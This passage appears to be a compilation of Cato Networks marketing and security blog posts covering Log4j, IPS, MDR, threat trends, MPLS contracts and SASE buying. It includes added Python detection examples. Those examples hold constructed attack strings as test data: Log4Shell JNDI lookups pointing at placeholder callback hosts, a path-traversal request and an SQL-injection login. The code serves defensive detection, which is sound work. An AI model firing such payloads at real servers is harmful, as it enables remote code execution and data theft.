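    """Distinct hosts the lookups point at, e.g. for an egress block list."""
    return sorted({h["host"] for h in hits})


# Constructed access-log lines (TEST-NET addresses, .example names).
LOG_LINES = [
    '203.0.113.7 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:03:14:09 +0000] "GET /login HTTP/1.1" 200 88 "-" '
    '"${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:03:14:11 +0000] '
    '"GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fcallback.example%2Fx%7D HTTP/1.1" 200 88 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for v in ("2.0-beta8", "2.0-beta9", "2.0-rc1", "2.14.1", "2.15.0"):
        print(f"{v:>10}: {'affected' if is_affected_version(v) else 'not affected'}")
    found = find_jndi_lookups(LOG_LINES)
    print(found)
    print("callback hosts:", callback_hosts(found))
```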
Cato’s Security Researchers Never Sleep, So You Can
Since the disclosure, the security analysts here at Cato Networks have been working tirelessly to identify, pinpoint and mitigate any potential vulnerability or exposure that our customers may have to this threat.
Here is our internal log of operations:
9th December 2021: The security community became aware of active exploitation attempts in the Apache Log4j software.
10th December 2021: Cato Networks identified the traffic signature associated with this exploit and started actively monitoring our customer base.
11th December 2021: Cato Networks implemented a global blocking rule within our IPS for all Cato customers to mitigate this vulnerability.
Action Items for Cato Customers: Just Read Your Emails
Cato customers have already been informed that if they have the Cato IPS enabled, they are protected. Cato is actively blocking the traffic signature of this vulnerability automatically. No patching or updates to the Cato platform are required.
This is the greatness of an IPS-as-a-Service managed by some of the greatest security researchers. Our customers don’t have to perform any maintenance work on their IPS, and can make much better use of their time: first by communicating to their upper management that their network is already secured and second, if they are using Apache products, by following the vendor’s advisory for remediation. Thanks to Cato, they can patch Apache at their own speed without fear of infiltration and exploitation.
What about the Cato SASE Cloud? Was it exposed?
In short, no. Our engineering and operations teams have worked side by side with our security analysts to investigate our own cloud and confirm that based on everything that we know, we are not vulnerable to this exploit.
Ultimately, no one is 100% bulletproof. The test is really about what you have done to minimize the potential risk, and what you can do to mitigate it when it manifests. Cato has all the resources, the skills and the talent to minimize our attack surface and make sure that our ability to respond to emerging threats is at the maximum. This is the right balance our customers deserve.
Sadly, This Is Not Over Just Yet
As often happens with such high-profile and critical CVEs, more data and IoCs (Indicators of Compromise) are surfacing as more analysts across the IT and cyber communities dive deeper into the case.
Our researchers are continuing their work as well, monitoring new discoveries across the community on the one hand, and running our own research and analysis on the other – all together targeted to make sure our customers remain protected.
IPS Features and Requirements: Is an Intrusion Prevention System Enough?
IPS (Intrusion Prevention System) is a technology for securing networks by scanning and blocking malicious network traffic. By identifying suspicious activities and dropping packets, an IPS can help reduce the attack surface of an enterprise network. Security attacks like DoS (Denial of Service), brute force attacks, viruses, worms and attacks that exploit temporary weaknesses can all be prevented with an IPS.
However, an IPS alone is not always enough to deal with the growing number of cyberattacks, which are negatively impacting business continuity through ransomware, network outages and data privacy breaches. This blog post explores how to implement an IPS in your overall security strategy with SASE. But first, let’s learn a bit more about IPS.
IPS vs. IDS - What’s the Difference?
IPS is often confused with IDS (Intrusion Detection System). IDS is the older generation of IPS. As the name implies, it detects and reports malicious activities, without any active blocking mechanisms. As a result, an IDS requires more active attention from IT to immediately block suspicious traffic, but on the other hand, legitimate traffic is never accidentally blocked, as sometimes happens with IPS. IPS is also sometimes referred to as IDPS.
IPS Features – How it Works
Most IPS solutions sit behind the firewall, though one type of IPS, HIPS (host-based IPS), sits on endpoints. The IPS mechanism operates as follows.
Scans and analyzes network traffic, and watches packet flows
Detects suspicious activities
Sends alarms to IT
Drops malicious packets
How Does IPS Detect Malicious Activity?
There are two methods the IPS can implement to accurately detect cyberattacks.
1. Signature-based Detection
IPS compares packet flows with a dictionary of CVEs and known patterns. When there is a pattern match, the IPS automatically alerts and blocks the packets. The dictionary can either contain patterns of specific exploits, or educated guesses of variants of known vulnerabilities.
2. Anomaly-based Detection
IPS uses heuristics to identify potential threats by comparing them to a known and approved baseline level and alerting in the case of anomalies.
IPS needs to ensure:
Performance – to enable network efficiency
Speed – to identify exploitations in real-time
Accuracy – to catch the right threats and avoid false positives
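As an added example (not Cato's code), a toy inline IPS that applies both detection methods described above to constructed packet flows: a signature dictionary match, and a per-source connection-rate baseline learned from clean traffic that drops sources exceeding it. The chatty monitoring host reproduces the false-positive risk mentioned earlier, and the allowlist shows the tuning it calls for. Addresses, the pattern and the placeholder CVE id are constructed.

```python
"""Toy inline IPS: signature-based and anomaly-based detection, then alert + drop
(constructed traffic, added example)."""
from collections import Counter
from dataclasses import dataclass
from statistics import mean, pstdev
import re


@dataclass(frozen=True)
class Packet:
    src: str
    dst_port: int
    payload: bytes


@dataclass(frozen=True)
class Verdict:
    action: str     # "pass" or "drop"
    method: str     # "" | "signature" | "anomaly"
    detail: str = ""


# Signature dictionary: compiled pattern -> label.  The pattern is an "educated
# guess" covering the plain and percent-encoded variants of one known behaviour;
# the CVE id is a placeholder standing in for a real advisory reference.
SIGNATURES = {
    re.compile(rb"(\.\.(/|%2f)){2,}", re.I): "path traversal (CVE-XXXX-NNNN placeholder)",
}


class ToyIPS:
    def __init__(self, signatures, k=3.0, floor=5):
        self.signatures = signatures
        self.k, self.floor = k, floor     # anomaly threshold = max(floor, mean + k*stdev)
        self.threshold = None

    def learn_baseline(self, windows):
        """windows: per-source connection counts from windows of known-good traffic."""
        rates = [n for w in windows for n in w.values()]
        self.threshold = max(self.floor, mean(rates) + self.k * pstdev(rates))
        return self.threshold

    def _signature(self, payload):
        for pattern, label in self.signatures.items():
            if pattern.search(payload):
                return label
        return None

    def inspect(self, packets, allowlist=frozenset()):
        """One Verdict per packet: a signature match or an anomaly means alert + drop."""
        per_src = Counter(p.src for p in packets)
        verdicts = []
        for p in packets:
            label = self._signature(p.payload)
            if label:
                verdicts.append(Verdict("drop", "signature", label))
            elif (self.threshold is not None and p.src not in allowlist
                  and per_src[p.src] > self.threshold):
                verdicts.append(Verdict("drop", "anomaly",
                                        f"{per_src[p.src]} connections from {p.src} "
                                        f"exceed baseline {self.threshold:.1f}"))
            else:
                verdicts.append(Verdict("pass", ""))
        return verdicts


def summarize(verdicts):
    """Counts by outcome: 'pass', 'signature', 'anomaly'."""
    return Counter(v.method or v.action for v in verdicts)


# Constructed clean baseline: connections per source in three past windows.
BASELINE_WINDOWS = [{"10.0.0.11": 3, "10.0.0.12": 4}, {"10.0.0.11": 2, "10.0.0.12": 5},
                    {"10.0.0.11": 3, "10.0.0.12": 4}]

# Constructed current window.
WINDOW = (
    [Packet("10.0.0.11", 80, b"GET /index.html HTTP/1.1")] * 2
    + [Packet("10.0.0.12", 80, b"GET /static/../../config.ini HTTP/1.1")]   # known pattern
    + [Packet("198.51.100.5", 22, b"")] * 8                                  # brute-force burst
    + [Packet("10.0.0.50", 80, b"GET /healthz HTTP/1.1")] * 7                # chatty monitoring host
)

if __name__ == "__main__":
    ips = ToyIPS(SIGNATURES)
    print("baseline threshold:", round(ips.learn_baseline(BASELINE_WINDOWS), 2))
    print("no allowlist:", summarize(ips.inspect(WINDOW)))            # monitor host is a false positive
    print("allowlisted: ", summarize(ips.inspect(WINDOW, {"10.0.0.50"})))
```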
IPS Joined with the Power of SASE
While IPS was built as a stand-alone solution, today it is best practice to complement it and enhance its capabilities by using IPS that is delivered as part of a SASE solution. This also enables IT to overcome the shortcomings of the stand-alone IPS:
Stand-alone IPS: Shortcomings
Inability to process encrypted packets without this having a huge impact on performance
Perimeter-based approach, which protects from incoming traffic only, and not from internal threats. (Read more about it in our ZTNA hub).
Inspection that is location-bound and does not usually include mobile and cloud traffic
High operational costs when IT updates new signatures and patches
IPS and SASE: Key Benefits
SASE is a global, cloud-native service that converges networking and security functions in one platform. By implementing IPS with SASE, IPS will:
Ensure high performance – scans and analyzes TLS-encrypted traffic without any capacity constraints that would affect performance or scaling capabilities
Secure the network, not the perimeter – inspects inbound and outbound traffic, both on a WAN or to and from the public Internet
Scan and protect all edges - includes remote users and branches, regardless of location and infrastructure (cloud or other)
Always secure and up-to-date – automatically updates the latest signatures, since these updates come from the SASE cloud, without any hands-on involvement from IT
Reducing the Attack Surface with IPS and SASE
IPS adds an important layer of security to enterprise networks, especially in this day and age of more and more highly sophisticated cyberattacks. However, to get the most out of IPS while reducing IT overhead and costs, it is recommended to implement an IPS together with SASE.
This provides organizations with all IPS capabilities, across their entire network and for all traffic types. In addition, with SASE, the security signatures and patches are managed entirely by the SASE cloud, eliminating false positives and removing resource-intensive processes from IT’s shoulders.
Cato is the leading SASE provider, enabling organizations to securely and optimally connect any user to any application anywhere on the globe. To get a consultation or a demo of the Cato SASE Cloud and how it works with IPS, Contact Us.
How to Terminate Your MPLS Contract Early
In the era of digital transformation, your organization might be looking for a more agile and cloud-friendly alternative to MPLS. But while getting off your MPLS contract might seem daunting due to hefty early termination fees, it’s actually easier and less expensive than you might think. Let’s look at the four steps required for terminating your MPLS contract, so you can find more flexible solutions (like SASE).
This blog post is based on the e-book “How to Terminate Your MPLS Contract Early”, which you can view here.
4 Steps for Your Get-Off-MPLS Strategy
Here are the four steps we recommend to help you make a smooth transition from MPLS to the solution of your choice, like SASE:
Understand the scope and terms of your MPLS contract
Identify the MPLS circuits that can (and should) be replaced
Involve your internal finance partners
Use these negotiating tactics with your MPLS provider
Now let’s dive into each one of them.
1. Understand the Scope and Terms of your MPLS Contract
MPLS contracts are long legal documents, but it’s important to understand which terms and conditions you’re obliged to. Here are some important things to look out for:
Does your termination date refer to the entire agreement, or to single MPLS circuits? In most contracts, the latter is the case. This means that your organization might have a number of separate terms for various circuits with different start and end dates. In such cases, it’s recommended to identify circuits that are about to expire the soonest to start the migration with them.
Is there a Minimum Annual Revenue Commitment (MARC)? Many MPLS contracts require a minimum monthly or annual spend. If you retire one of your circuits and your spending falls below that minimum, you might be subject to a financial penalty.
What is your liability for terminating an MPLS circuit before the termination date? Do you have to pay the entire sum of the fees, or maybe some of them? Discontinuing might still be worth it, despite the fees.
What’s your notice of termination period? Check how early you have to notify the carrier about discontinuing services.
Are you subject to automatic renewal? Are you locked into the contract unless you notify the carrier otherwise?
By understanding what your contract requires, you can now proceed to the next steps of determining your termination and transition plan.
2. Identify the MPLS Circuits that Can (and Should) Be Replaced
To get a better picture of your available termination options, we recommend preparing a spreadsheet that will help you determine which circuits to target first:
Create a row for each circuit.
Detail the liabilities and termination dates for each one.
Order the circuits according to termination dates to see which ones can be migrated the soonest.
Identify circuits that can be terminated without violating MARC and incurring penalties.
Check the monthly rate for circuits, in case you want to overlap through the migration.
Suggested spreadsheet columns include: MARC Violation (Y/N), Monthly Rate.
Now that you have your circuit status laid out, identify additional factors that will influence your migration options and negotiation:
How much are you spending with your carrier overall? Even if you have early MPLS termination fees, you may be able to negotiate and leverage additional services to help waive them.
What’s the ROI of your services after switching to SASE? The numbers will help you decide which penalties are worth paying.
Now that you’ve identified different action plans, it’s time to get the finance department involved.
Migrating from MPLS to SASE with Cato Networks
Cato is the world’s first SASE platform, converging SD-WAN and network security into a global cloud-native service. Cato optimizes and secures application access for all users and locations. Using Cato SASE Cloud, customers easily migrate from MPLS to SD-WAN, improve connectivity to on-premises and cloud applications, enable secure branch Internet access everywhere, and seamlessly integrate cloud data centers and remote users into the network with a zero-trust architecture. With Cato, your network and business are ready for whatever’s next. Learn more.
Security Threat Research Highlights #1
In Q1 2021, 190 billion traffic flows passed through Cato’s SASE Network. Leveraging deep network visibility and proprietary machine learning algorithms, our MDR team set out to analyze and identify new cyber threats and critical security trends, and have recently published their findings in the SASE Threat Research Report. Below, we provide you with 5 key insights from this report.
Key Highlights from Cato Networks’ SASE Threat Research Report
#1. Top 5 Threat Types in 2021
By using machine learning to identify high-risk threats and verified security incidents, Cato is able to identify the most common types of attacks in Q1 2021. The top five observed threat types include:
Network Scanning: The attacker is detected testing different ports to see which services are running and potentially exploitable.
Reputation: Inbound or outbound communications are detected that point to known-bad domains or IP addresses.
Vulnerability Scan: A vulnerability scanner (like Nessus, OpenVAS, etc.) is detected running against a company’s systems.
Malware: Malware is detected within network traffic.
Web Application Attack: Attempted exploitation of a web application vulnerability, such as cross-site scripting (XSS) or SQL injection, is detected.
The top three threat types demonstrate that cybercriminals are committed to performing reconnaissance of enterprise systems (using both port and vulnerability scans) and are successfully gaining initial access (as demonstrated by the large number of inbound and outbound suspicious traffic flows).
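As an added example (not Cato’s detection logic or code from the report), the following Python classifies constructed flow records into the five threat types listed above and ranks them by the number of sources that triggered each. The heuristics are assumptions for illustration: a distinct-port count for network scanning, a placeholder known-bad host list for reputation, scanner product names in the HTTP User-Agent, a placeholder file hash for malware, and injection or traversal patterns in request paths for web application attacks.

```python
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass
class Flow:
    """One constructed flow record; the fields are assumptions for this example."""
    src: str
    dst: str
    dport: int
    http_path: str = ""        # request path, if the flow carried HTTP
    user_agent: str = ""       # HTTP User-Agent, if any
    payload_sha256: str = ""   # hash of a transferred file, if one was seen


# Constructed reference data with placeholder values, not real indicators.
KNOWN_BAD_HOSTS = {"198.51.100.7", "c2.bad.invalid"}
KNOWN_MALWARE_HASHES = {"0" * 63 + "1"}
SCANNER_UA_MARKERS = ("nessus", "openvas")
WEB_ATTACK_MARKERS = ("<script", "' or 1=1", "union select", "../")
SCAN_DISTINCT_PORTS = 10   # distinct ports from one source to one host


def classify(flows):
    """Map each source address to the set of threat types its flows triggered."""
    findings = defaultdict(set)
    ports_seen = defaultdict(set)          # (src, dst) -> distinct destination ports
    for f in flows:
        ports_seen[(f.src, f.dst)].add(f.dport)
        # Reputation: either end of the flow is a known-bad host
        if f.src in KNOWN_BAD_HOSTS or f.dst in KNOWN_BAD_HOSTS:
            findings[f.src].add("Reputation")
        # Vulnerability scan: a scanner product is named in the User-Agent
        if any(m in f.user_agent.lower() for m in SCANNER_UA_MARKERS):
            findings[f.src].add("Vulnerability Scan")
        # Malware: a transferred file matches a known hash
        if f.payload_sha256 and f.payload_sha256 in KNOWN_MALWARE_HASHES:
            findings[f.src].add("Malware")
        # Web application attack: injection or traversal pattern in the path
        if any(m in f.http_path.lower() for m in WEB_ATTACK_MARKERS):
            findings[f.src].add("Web Application Attack")
    # Network scanning: one source probing many distinct ports on one host
    for (src, _dst), ports in ports_seen.items():
        if len(ports) >= SCAN_DISTINCT_PORTS:
            findings[src].add("Network Scanning")
    return dict(findings)


def rank_threat_types(findings):
    """Count sources per threat type, most common first (the report's top-N view)."""
    counts = Counter(t for types in findings.values() for t in types)
    return counts.most_common()


def sample_flows():
    """Constructed traffic: one port scanner, two reputation hits, one
    vulnerability scanner, one web attack and one malware download."""
    flows = [Flow("203.0.113.5", "10.0.0.10", p) for p in range(20, 36)]
    flows += [
        Flow("198.51.100.7", "10.0.0.10", 443),            # inbound from known-bad IP
        Flow("10.0.0.20", "c2.bad.invalid", 443),          # outbound to known-bad host
        Flow("203.0.113.9", "10.0.0.10", 80, "/", "Mozilla/5.0 (compatible; Nessus)"),
        Flow("203.0.113.11", "10.0.0.10", 80, "/login?user=admin' OR 1=1--"),
        Flow("10.0.0.30", "files.example.invalid", 443, "", "", "0" * 63 + "1"),
    ]
    return flows


if __name__ == "__main__":
    result = classify(sample_flows())
    for src, types in sorted(result.items()):
        print(src, sorted(types))
    print(rank_threat_types(result))
```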
#2. Regional Bans Create False Sense of Security
In the news, most cybercrime and other online malicious activity are attributed to a small set of countries. As a result, it seems logical that creating firewall rules blocking traffic to and from these countries would dramatically improve a company’s security posture.
However, these regional bans actually create a false sense of security. The vast majority of malicious activity originates in the US, which accounts for more than the next four largest sources (Venezuela, China, Germany, and Japan) put together. Regional bans have little or no impact because most malware sources and command & control servers are in the US.
#3. Cybercriminals Exploit Remote Administration Tools
Remote access and administration tools such as TeamViewer became significantly more popular during the pandemic. These tools enabled businesses to continue functioning despite a sudden and forced transition to remote work.
However, these tools are popular with cybercriminals as well. Attackers will try to brute-force credentials for these services and use them to gain direct access to a company’s environment and resources. RDP is now a common delivery vector for ransomware, and a poorly-secured TeamViewer made the Oldsmar water treatment hack possible.
#4. Legacy Software and PHP are Common Targets
An analysis of the Common Vulnerabilities and Exposures (CVEs) most targeted by cybercriminals reveals some interesting trends. The first is that PHP-related vulnerabilities are extremely popular, making up three of the top five vulnerabilities and potentially allowing an attacker to gain remote code execution (RCE).
Another important takeaway is that cybercriminals are targeting age-old threats lurking on enterprise networks. Cybercriminals are commonly scanning for end-of-life, unsupported systems and vulnerabilities that are over 20 years old.
#5. Enterprise Traffic Flows Aren’t What You Expect
The analysis of business network traffic flows shows that Microsoft Office and Google applications are the two most commonly used cloud apps in enterprise networks.
However, that is not to say that they are the most common network flows on enterprise networks. In fact, the average enterprise has more traffic to TikTok than Gmail, LinkedIn, or Spotify. These TikTok flows threaten enterprise security. Consumer applications can be used to deliver malware or phishing content, and the use of unsanctioned apps creates new vulnerabilities and potential attack vectors within a company’s network.
Improve Your Network Visibility and Security with Cato
Cato’s quarterly SASE Threat Research Report demonstrated the importance of deep network visibility and understanding for enterprise security. While some of the trends (such as the exploitation of remote access solutions) may have been predictable, others were less so. To learn more about the evolving threat landscape, read the full report, and stay tuned for the next one.
Cato was able to generate this report based on the deep visibility provided by its SASE network. Achieving this level of visibility is essential for enterprises looking to identify the top trends and security threats within their networks.
Understanding Managed Detection and Response: What is MDR?
Managed Detection and Response (MDR) is a security service designed to provide ongoing protection, detection, and response for cybersecurity threats. MDR solutions use machine learning to investigate, alert, and contain cyber threats at scale. Additionally, MDR solutions should include a proactive element, including the use of threat hunting to identify and remediate vulnerabilities or undetected threats within an enterprise’s IT environment.
As the name suggests, MDR should be a fully managed solution, on top of being an automated one. While MDR relies heavily on advanced technology for threat detection and rapid incident response, human analysts should also be involved in the process to validate alerts and ensure that the proper responses are taken.
According to Gartner, MDR services provide turnkey threat detection and response through remotely delivered, 24/7 security operations center capabilities. Gartner predicts that half of companies will partner with an MDR provider by 2025.
The Need for MDR
MDR has evolved to meet the cybersecurity needs of the modern enterprise. The rapid expansion of the cyber threat landscape and widespread use of automation by threat actors means that everyone is at risk of cyberattacks. These threats are evolving quickly with new ones introduced every day.
Detecting and responding to these advanced threats requires capabilities that many enterprises are lacking. On average, it takes six months for an enterprise to identify a data breach after it has occurred (the “dwell time”), a number that has doubled in the last two years. Additionally, the cost of a data breach continues to rise and is currently almost $4 million.
MDR is important because it provides enterprises with the security capabilities that they lack in-house. With MDR, enterprises can rapidly achieve the level of security needed to prevent, detect, and respond to advanced threats, as well as sustain these capabilities as cyber threats continue to evolve.
The Challenges MDR Confronts
A six-month dwell time demonstrates that businesses are struggling to identify and respond to cybersecurity incidents, due to various factors, including:
Lack of In-House Security Talent: The cybersecurity industry is experiencing a talent gap with an estimated 3.1 million unfilled roles worldwide, and 64% of enterprises struggle to find qualified security talent. With MDR, enterprises can leverage external talent and resources to fill security gaps.
Complex Security Tools: Security solutions may require careful tuning to an enterprise’s environment, which requires expertise with these tools. MDR eliminates the need for enterprises to maintain these skills in-house.
Security Alert Overload: The average enterprise’s security operations center (SOC) receives over 10,000 security alerts per day, which can easily overwhelm a security team. MDR only notifies the enterprise of threats that require their attention.
Advanced Threat Prevention and Preparation: Preventing, detecting, and remediating attacks by threat actors requires specialized knowledge and expertise. The MDR service includes incident prevention, detection, and response.
MDR by Cato
Cato offers MDR services to its Cato SASE Cloud customers. Some of the key features of Cato MDR include:
Zero-Footprint Data Collection: Cato’s MDR and Zero-Day threat prevention services are built on Cato Cloud, its cloud-native SASE network. With network visibility and security built into the network infrastructure itself, there is no need for additional installations.
Automated Threat Hunting: Cato performs automated threat hunting, leveraging big data and machine learning to identify anomalous and suspicious traffic across its platform. Cato’s rich dataset and wide visibility enable it to rapidly and accurately identify potential threats.
Human Verification: The results of Cato’s automated analysis are verified by human security analysts. This prevents action from being taken based on false positive detections.
Network Level Threat Containment: Cato controls the infrastructure that all network traffic flows over and has application-layer visibility into traffic. This enables Cato to isolate infected systems at the network level.
Guided Remediation: Cato provides guidance to help enterprises through the process of remediating a cybersecurity incident. This helps to ensure that the threat has been eliminated before quarantine is lifted and normal operations are restored.
Cato’s MDR has immediate ‘time to value’ because it can roll out immediately with no additional solution deployment required. To learn more about Cato SASE Cloud and Cato MDR service, contact us. In our next post, MDR: The Benefits of Managed Detection and Response, we take a look at a number of key benefits that enterprises can expect when partnering with an MDR provider.
The Benefits of Managed Detection and Response (MDR)
Before diving into the benefits of partnering with an MDR provider, we recommend reading our previous post, MDR: Understanding Managed Detection and Response.
What is MDR?
In a nutshell, MDR provides ongoing threat detection and response for network security threats using machine learning to investigate, alert, and contain security threats at scale. The “managed” in MDR refers to the fact that these automated solutions are complemented by human operators who validate alerts and support proactive activities such as threat hunting and vulnerability management.
According to Gartner, half of companies will partner with an MDR provider by 2025. This rapid adoption is driven by several factors, including the expanding cybersecurity skills gap and the emergence of technologies like secure access service edge (SASE) and zero trust network access (ZTNA) that enable MDR providers to more effectively and scalably offer their services.
Managed Detection and Response Benefits
MDR providers act as a full-service outsourced SOC for their customers, and partnering with an MDR provider carries a number of benefits:
24/7 Monitoring: MDR providers offer round-the-clock monitoring and protection for client networks. Since cyberattacks can happen at any time, this constant protection is essential for rapid response to threats.
Proactive Approach: MDR offers proactive security, such as threat hunting and vulnerability assessments. By identifying and closing security holes before they are exploited by an attacker, MDR helps to reduce cyber risk and the likelihood of a successful cybersecurity incident.
Better Intelligence: MDR providers have both broad and deep visibility into client networks. This enables them to develop and use threat intelligence based on both wide industry trends and enterprise-specific threats during incident detection and response.
Experienced Analysts: MDR helps to close the cybersecurity skills gap by providing customers with access to skilled cybersecurity professionals. This both helps to meet headcount and ensures that customers have access to specialized skill sets when they need them.
Vulnerability Management: Vulnerability management can be complex and time-consuming, and many companies rapidly fall behind. MDR providers can help to identify vulnerable systems, perform virtual patching, and support the installation of required updates.
Improved Compliance: MDR providers often have expertise in regulatory compliance, and their solutions are designed to meet the requirements of applicable laws and regulations. Additionally, the deep visibility of an MDR provider can simplify and streamline compliance reporting and audits.
Managed Detection and Response Tools
When offered as part of a SASE solution, MDR delivers the following key benefits:
Zero-Footprint Data Collection: With MDR and zero-day threat prevention services built into the SASE Cloud, additional security solutions are unnecessary.
Automated Threat Hunting: When MDR monitors for suspicious network flows using ML/AI, this allows rapid, scalable detection of potential cyber threats, decreasing the time that an intrusion goes undetected (“dwell time”).
Human Verification: All automatically-generated security alerts are reviewed and validated by the SASE vendor’s SOC team. This eliminates false positives and ensures that true threats receive the attention that they deserve.
Network Level Threat Containment: The SASE vendor’s control over the underlying network infrastructure enables it to quarantine infected computers. This prevents threats from spreading while remediation is occurring.
Guided Remediation: MDR built into SASE provides contextual data and remediation recommendations for identified threats to the SASE vendor’s security team.
Adopting MDR for your Organization
Cato’s MDR has immediate ‘time to value’ for its Cato SASE Cloud customers because security is built into its network infrastructure and security services can be rolled out immediately. This allows companies to rapidly achieve the security maturity needed to achieve regulatory compliance and protect themselves against cyber threats.
To learn more about Cato’s MDR services contact us and request a free demo.
26 Cybersecurity Acronyms and Abbreviations You Should Get to Know
We’ve all heard of AV and VPN, but there are many more cybersecurity-related acronyms and abbreviations that are worth taking note of. We gathered a list of the key acronyms to help you keep up with the constantly evolving cybersecurity landscape.
Secure Access Service Edge (SASE) is a cloud-based solution that converges network and security functionalities. SASE’s built-in SD-WAN functionality offers network optimization, while the integrated security stack – including Next Generation Firewall (NGFW), Secure Web Gateway (SWG), Zero Trust Network Access (ZTNA), and more – secures traffic over the corporate WAN. According to Gartner (which coined the term), SASE is “the future of network security.”
Cloud Access Security Broker (CASB) sits between cloud applications and users. It monitors all interactions with cloud-based applications and enforces corporate security policies. As cloud adoption grows, CASB (which is natively integrated into SASE solutions) becomes an essential component of a corporate security policy.
Zero Trust Network Access (ZTNA), also called a software-defined perimeter (SDP), is an alternative to Virtual Private Network (VPN) for secure remote access. Unlike VPN, ZTNA provides access to corporate resources on a case-by-case basis in compliance with zero trust security policies. ZTNA can be deployed as part of a SASE solution to support the remote workforce of the modern distributed enterprise.
Software-Defined Perimeter (SDP) is another name for ZTNA. It is a secure remote access solution that enforces zero trust principles, unlike legacy remote access solutions.
Zero Trust Edge (ZTE) is Forrester’s version of SASE and uses ZTNA to provide a more secure Internet on-ramp for remote sites and workers. A ZTE model is best implemented with SASE, which distributes security functionality at the network edge and enforces zero trust principles across the corporate WAN.
Deep Packet Inspection (DPI) involves looking at the contents of network packets rather than just their headers. This capability is essential to detecting cyberattacks that occur at the application layer. SASE solutions use DPI to support their integrated security functions.
Next-Generation Firewall (NGFW) uses deep packet inspection to perform Layer 7 application traffic analysis and intrusion detection. NGFW also has the ability to consume threat intelligence to make informed threat decisions and may include other advanced features beyond those of the port/protocol inspection of the traditional firewall.
Firewall as a Service (FWaaS) delivers the capabilities of NGFW as a cloud-based service. FWaaS is one of the foundational security capabilities of a SASE solution.
Intrusion Prevention System (IPS) is designed to detect and block attempted attacks against a network or system. In addition to generating alerts, like an intrusion detection system (IDS) would, an IPS can update firewall rules or take other actions to block malicious traffic.
Secure Web Gateway (SWG) is designed to protect against Internet-borne threats such as phishing or malware and enforce corporate policies for Internet surfing. SWG is a built-in capability of a SASE solution, providing secure browsing to all enterprise employees.
Next Generation Anti-Malware (NG-AM) uses advanced techniques, such as machine learning and anomaly detection to identify potential malware. This allows detecting modern malware, which is designed to evade traditional, signature-based detection schemes.
Unified Threat Management (UTM) is a term for security solutions that provide a number of different network security functions. SASE delivers all network security needs from a cloud service, eliminating the hassle of dealing with appliance life-cycle management of UTM.
Data Loss Prevention (DLP) solutions are designed to identify and respond to attempted data exfiltration, whether intentional or accidental. The deep network visibility of SASE enables providing DLP capabilities across the entire corporate WAN.
Web Application Firewall (WAF) monitors and filters traffic to web applications to block attempted exploitation or abuse of web applications. SASE includes WAF functionality to protect web applications both in on-premises data centers and cloud deployments.
Security Information and Event Management (SIEM) collects, aggregates, and analyzes data from security appliances to provide contextual data and alerts to security teams. This functionality is necessary for legacy security deployments relying on an array of standalone solutions rather than a converged network security infrastructure (i.e. SASE).
Security Operations Center (SOC) is responsible for protecting enterprises against cyberattacks. Security analysts investigate alerts to determine if they are real incidents, and, if so, perform incident response and remediation.
Managed Detection and Response (MDR) is a managed security service model that provides ongoing threat detection and response by using AI and machine learning to investigate, alert, and contain threats. When MDR is incorporated into a SASE solution, SOC teams have immediate, full visibility into all traffic, eliminating the need for additional network probes or software agents.
Transport Layer Security (TLS) is a network protocol that wraps traffic in a layer of encryption and provides authentication of the server to the client. TLS is the difference between HTTP and HTTPS for web browsing.
Secure Sockets Layer (SSL) is a predecessor to TLS. Often, the protocol is referred to as SSL/TLS.
Threat Intelligence (TI) is information designed to help with detecting and preventing cyberattacks. TI can include malware signatures, known-bad IP addresses and domain names, and information about current cyberattack campaigns.
Common Vulnerabilities and Exposures (CVE) is a list of publicly disclosed computer security flaws. Authorities like MITRE will assign a CVE to a newly-discovered vulnerability to make it easier to track and collate information about vulnerabilities across multiple sources that might otherwise name and describe it in different ways.
Advanced Persistent Threat (APT) is a sophisticated cyber threat actor typically funded by nation-states or organized crime. These actors get their name from the fact that they have the resources and capabilities required to pose a sustained threat to enterprise cybersecurity.
Distributed Denial of Service (DDoS) attacks involve multiple compromised systems sending spam requests to a target service. The objective of these attacks is to overwhelm the target system, leaving it unable to respond to legitimate user requests.
Extended Detection and Response (XDR) is a cloud-based solution that integrates multiple different security functions to provide more comprehensive and cohesive protection against cyber threats. It delivers proactive protection against attacks by identifying and blocking advanced and stealthy cyberattacks.
Security Service Edge (SSE) moves security functionality from the network perimeter to the network edge. This is the underlying principle behind SASE solutions.
Indicators of Compromise (IoCs) are data that can be used to determine if a system has been compromised by a cyberattack, such as malware signatures or known-bad IP addresses or domains. IoCs are commonly distributed as part of a threat intelligence feed.
Navigating Your First Steps with a Potential SASE Vendor
When deciding to digitally transform your network to SASE, the large number of vendors out there might be confusing. What’s the best approach to take when comparing the different service providers? This blog post will provide you a methodical way to manage the conversations with any potential vendor, so you can ensure their solution can answer your needs.
To get the full SASE RFP template to help you navigate the vendor vetting process, click here. But first, let’s understand what SASE is.
What is SASE?
SASE (Secure Access Service Edge) is an innovative network and security architecture that is being increasingly adopted by global organizations. As a unified, global and cloud-based network that supports all edges, SASE improves network performance, reduces the attack surface and minimizes IT overhead.
What to Discuss with Potential SASE Vendors
We recommend discussing four main categories with your vendor as part of your RFI process:
Your business and IT
The vendor’s architecture
The vendor’s capabilities
The vendor’s service and support
Let’s dive into each one and see which aspects should be covered.
1. Your Business and IT
The purpose of this first discussion area is to help vendors to understand your business goals and your existing architecture. This will enable them to customize their solution to your needs and explain the value it can provide you.
Discussion points should include:
Your business - provide an overview of your business, as well as the SASE project’s business goals in your eyes.
IT architecture - describe your topology and stack, including your network architecture, technologies, topologies, geographies and security capabilities. Include any existing IT projects you are running or plan to incorporate in the future.
Use cases - explain your current and planned use cases. Include geographies, mobile users, branches, cloud migration plans, and more.
Pro tip: provide the vendor with information about your future business goals that are seemingly unrelated to the project. You might be surprised at how SASE can help you achieve them.
2. SASE Architecture
The following section of the SASE RFI template will enable you to validate that the vendor’s SASE architecture meets your business network needs, such as SD-WAN, global reach, where elements are placed, and more.
Discussion points include:
Architecture components - understand how the vendor provides SD-WAN, secure branch access, cloud optimization, global connectivity and mobile access.
Architecture capabilities - ensure the architecture can support and provide high availability, stability, scalability, high performance, and simplified management.
Architecture diagram - ask to see a diagram of the vendor’s architecture.
Pro tip: Ask the vendor to explain how the different components and capabilities contribute to the success of the project and your business goals.
3. SASE Capabilities
